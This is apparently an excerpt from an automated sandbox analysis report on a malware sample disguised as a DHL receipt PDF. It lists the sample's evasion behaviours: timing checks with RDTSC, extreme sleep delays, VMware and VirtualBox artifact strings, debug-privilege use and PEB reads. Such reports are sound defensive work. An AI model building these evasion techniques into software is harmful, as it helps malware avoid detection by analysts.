Source: C:\Windows\SysWOW64\find.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000029D8614 second address: 00000000029D861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000029D89AE second address: 00000000029D89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe TID: 7040 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_004088E0 rdtsc 2_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\find.exe API coverage: 9.1 %
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: 63d-b2daf143ffb9", "roleDefinitionId": "f96bd990-ffdf-4c17-8ee3-77454d9c3f5d" } ], "id": "/subscriptions/a18897a6-7e44-457d-9260-f2854c0aca42/providers/Microsoft.SqlVirtualMachine", "namespace": "Microsoft.SqlVirtualMachine",
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "SqlVirtualMachines"
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "North Central US (Stage)" ], "properties": null, "resourceType": "virtualMachines/diagnosticSettings" }, { "aliases": null, "apiVersions": [ "2014-04-01" ], "capabi
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\EnumNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000004.00000000.516455897.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "Southeast Asia", "UK West", "West US", "South Africa North", "UAE Central", "UAE North" ], "properties": null, "resourceType": "SqlVirtualMachineGroups/AvailabilityGr
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "Korea Central", "Korea South", "France Central", "South Africa North", "UAE North" ], "properties": null, "resourceType": "locations/virtualMachines" }, { "a
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: eType": "labs/virtualMachines" }, { "aliases": null, "apiVersions": [ "2018-10-15-preview", "2018-09-15", "2017-04-26-preview", "2016-05-15" ], "capabilities": "Cross
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "Locations/sqlVirtualMachineGroupOperationResults"
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: Move, SupportsTags, SupportsLocation", "locations": [ "West Europe", "East US", "West US" ], "properties": null, "resourceType": "virtualMachines" }, { "aliases": null,
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "locations/supportedVirtualMachineSizes"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: explorer.exe, 00000004.00000000.490084142.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachines/diagnosticSettings"
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "France Central" ], "properties": null, "resourceType": "VMwareSites" }, { "aliases": null, "apiVersions": [ "2019-06-06", "2018-05-01-preview" ], "capabil
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: ceType": "locations/privateClouds/virtualMachineTemplates" }, { "aliases": null, "apiVersions": [ "2019-04-01" ], "capabilities": "None", "locations": [ "West Europe",
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachineScaleSets/networkInterfaces"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachines/extensions"
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: name": "CloudSimpleExtension" } ] } ], "id": "/subscriptions/a18897a6-7e44-457d-9260-f2854c0aca42/providers/Microsoft.VMwareCloudSimple", "namespace": "Microsoft.VMwareCloudSimple", "registrationPolicy": "Registra
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachineScaleSets/extensions"
Source: explorer.exe, 00000004.00000000.489833071.0000000007F92000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachines/metrics"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachineScaleSets/virtualMachines"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "SqlVirtualMachineGroups/AvailabilityGroupListeners"
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "resourceType": "Locations/sqlVirtualMachineGroupOperationResults" }, { "aliases": null, "apiVersions": [ "2017-03-01-preview" ], "capabilities": "None", "defaultApiVersion": "2017-03-01-p
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: es": null, "resourceType": "virtualMachines/metrics" }, { "aliases": null, "apiVersions": [ "2017-04-01", "2016-11-01", "2016-04-01", "2015-12-01", "2015-10-01",
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "UK South", "UK West", "Korea Central", "Korea South", "France Central", "South Africa North", "UAE North" ], "properties": null, "resourceType": "virtualMachineSc
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
Source: explorer.exe, 00000004.00000000.490084142.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: ral", "UAE North" ], "properties": null, "resourceType": "Locations/sqlVirtualMachineOperationResults" }, { "aliases": null, "apiVersions": [ "2017-03-01-preview" ],
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: India", "Korea Central", "Korea South", "East US 2 (Stage)", "North Central US (Stage)" ], "properties": null, "resourceType": "virtualMachines/metricDefinitions" }, {
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: th" ], "properties": null, "resourceType": "SqlVirtualMachineGroups" }, { "aliases": null, "apiVersions": [ "2017-03-01-preview" ], "capabilities": "CrossResourceGroupResou
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "Australia Central" ], "properties": null, "resourceType": "virtualMachines" }, { "aliases": null, "apiVersions": [ "2016-11-01", "2016-04-01", "2015-12-01",
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "properties": null, "resourceType": "virtualMachines", "zoneMappings": [ { "location": "East US 2", "zones": [ "2", "1", "3" ] },
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "locations/virtualMachines"
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: achineScaleSets/virtualMachines" }, { "aliases": null, "apiProfiles": [ { "apiVersion": "2016-03-30", "profileVersion": "2017-03-09-profile" }, { "apiVersio
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "UK West", "Korea Central", "Korea South", "France Central", "South Africa North", "UAE North" ], "properties": null, "resourceType": "virtualMachines/metricDefinitions"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachines",
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachines/metricDefinitions"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "id": "/subscriptions/a18897a6-7e44-457d-9260-f2854c0aca42/providers/Microsoft.VMwareCloudSimple",
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachineScaleSets/virtualMachines/networkInterfaces"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "SqlVirtualMachineGroups"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachineScaleSets",
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "VMwareSites"
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: ], "properties": null, "resourceType": "SqlVirtualMachines" }, { "aliases": null, "apiVersions": [ "2017-03-01-preview" ], "capabilities": "None", "defaultApiVersion":
Source: explorer.exe, 00000004.00000000.476501179.0000000000E38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: "resourceType": "virtualMachineScaleSets/virtualMachines/networkInterfaces" }, { "aliases": null, "apiProfiles": [ { "apiVersion": "2017-03-30", "profileVersion": "2018-03-01-hybrid"
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: a North", "UAE North" ], "properties": null, "resourceType": "virtualMachineScaleSets", "zoneMappings": [ { "location": "East US 2", "zones": [ "2",
Source: explorer.exe, 00000004.00000000.490084142.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: uth", "UK West", "Korea Central", "Korea South", "France Central", "South Africa North", "UAE North" ], "properties": null, "resourceType": "virtualMachineScaleSets/pu
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: ], "properties": null, "resourceType": "locations/supportedVirtualMachineSizes" }, { "aliases": null, "apiVersions": [ "2019-08-01", "2019-07-01", "2019-06-01",
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "namespace": "Microsoft.SqlVirtualMachine",
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000004.00000000.529318652.0000000006915000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "id": "/subscriptions/a18897a6-7e44-457d-9260-f2854c0aca42/providers/Microsoft.SqlVirtualMachine",
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachineScaleSets/publicIPAddresses"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "virtualMachines"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "labs/virtualMachines"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "locations/privateClouds/virtualMachineTemplates"
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "resourceType": "Locations/sqlVirtualMachineOperationResults"
Source: DHL_29028263 receipt document of the purchase,pdf.exe Binary or memory string: ": "virtualMachineScaleSets/networkInterfaces" }, { "aliases": null, "apiProfiles": [ { "apiVersion": "2016-03-30", "profileVersion": "2017-03-09-profile" }, {
Source: explorer.exe, 00000004.00000000.489833071.0000000007F92000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: "namespace": "Microsoft.VMwareCloudSimple",
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_004088E0 rdtsc 2_2_004088E0
Enables debug privileges
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\find.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C131B mov eax, dword ptr fs:[00000030h] 2_2_032C131B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0320DB60
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03233B7A mov eax, dword ptr fs:[00000030h] 2_2_03233B7A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03233B7A mov eax, dword ptr fs:[00000030h] 2_2_03233B7A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320DB40 mov eax, dword ptr fs:[00000030h] 2_2_0320DB40
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D8B58 mov eax, dword ptr fs:[00000030h] 2_2_032D8B58
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320F358 mov eax, dword ptr fs:[00000030h] 2_2_0320F358
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D5BA5 mov eax, dword ptr fs:[00000030h] 2_2_032D5BA5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03234BAD mov eax, dword ptr fs:[00000030h] 2_2_03234BAD
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03234BAD mov eax, dword ptr fs:[00000030h] 2_2_03234BAD
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03234BAD mov eax, dword ptr fs:[00000030h] 2_2_03234BAD
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C138A mov eax, dword ptr fs:[00000030h] 2_2_032C138A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032BD380 mov ecx, dword ptr fs:[00000030h] 2_2_032BD380
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03211B8F mov eax, dword ptr fs:[00000030h] 2_2_03211B8F
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03211B8F mov eax, dword ptr fs:[00000030h] 2_2_03211B8F
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323B390 mov eax, dword ptr fs:[00000030h] 2_2_0323B390
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03232397 mov eax, dword ptr fs:[00000030h] 2_2_03232397
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032303E2 mov eax, dword ptr fs:[00000030h] 2_2_032303E2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032303E2 mov eax, dword ptr fs:[00000030h] 2_2_032303E2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032303E2 mov eax, dword ptr fs:[00000030h] 2_2_032303E2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032303E2 mov eax, dword ptr fs:[00000030h] 2_2_032303E2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032303E2 mov eax, dword ptr fs:[00000030h] 2_2_032303E2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032303E2 mov eax, dword ptr fs:[00000030h] 2_2_032303E2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0322DBE9
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032853CA mov eax, dword ptr fs:[00000030h] 2_2_032853CA
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032853CA mov eax, dword ptr fs:[00000030h] 2_2_032853CA
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03244A2C mov eax, dword ptr fs:[00000030h] 2_2_03244A2C
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03244A2C mov eax, dword ptr fs:[00000030h] 2_2_03244A2C
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03218A0A mov eax, dword ptr fs:[00000030h] 2_2_03218A0A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03205210 mov eax, dword ptr fs:[00000030h] 2_2_03205210
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03205210 mov ecx, dword ptr fs:[00000030h] 2_2_03205210
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03205210 mov eax, dword ptr fs:[00000030h] 2_2_03205210
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03205210 mov eax, dword ptr fs:[00000030h] 2_2_03205210
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320AA16 mov eax, dword ptr fs:[00000030h] 2_2_0320AA16
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320AA16 mov eax, dword ptr fs:[00000030h] 2_2_0320AA16
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03223A1C mov eax, dword ptr fs:[00000030h] 2_2_03223A1C
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032BB260 mov eax, dword ptr fs:[00000030h] 2_2_032BB260
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032BB260 mov eax, dword ptr fs:[00000030h] 2_2_032BB260
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D8A62 mov eax, dword ptr fs:[00000030h] 2_2_032D8A62
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0324927A mov eax, dword ptr fs:[00000030h] 2_2_0324927A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03209240 mov eax, dword ptr fs:[00000030h] 2_2_03209240
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03209240 mov eax, dword ptr fs:[00000030h] 2_2_03209240
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03209240 mov eax, dword ptr fs:[00000030h] 2_2_03209240
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03209240 mov eax, dword ptr fs:[00000030h] 2_2_03209240
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03294257 mov eax, dword ptr fs:[00000030h] 2_2_03294257
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032052A5 mov eax, dword ptr fs:[00000030h] 2_2_032052A5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032052A5 mov eax, dword ptr fs:[00000030h] 2_2_032052A5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032052A5 mov eax, dword ptr fs:[00000030h] 2_2_032052A5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032052A5 mov eax, dword ptr fs:[00000030h] 2_2_032052A5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032052A5 mov eax, dword ptr fs:[00000030h] 2_2_032052A5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0321AAB0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0321AAB0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0323FAB0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323D294 mov eax, dword ptr fs:[00000030h] 2_2_0323D294
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323D294 mov eax, dword ptr fs:[00000030h] 2_2_0323D294
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03232AE4 mov eax, dword ptr fs:[00000030h] 2_2_03232AE4
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03232ACB mov eax, dword ptr fs:[00000030h] 2_2_03232ACB
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03224120 mov eax, dword ptr fs:[00000030h] 2_2_03224120
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03224120 mov eax, dword ptr fs:[00000030h] 2_2_03224120
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03224120 mov eax, dword ptr fs:[00000030h] 2_2_03224120
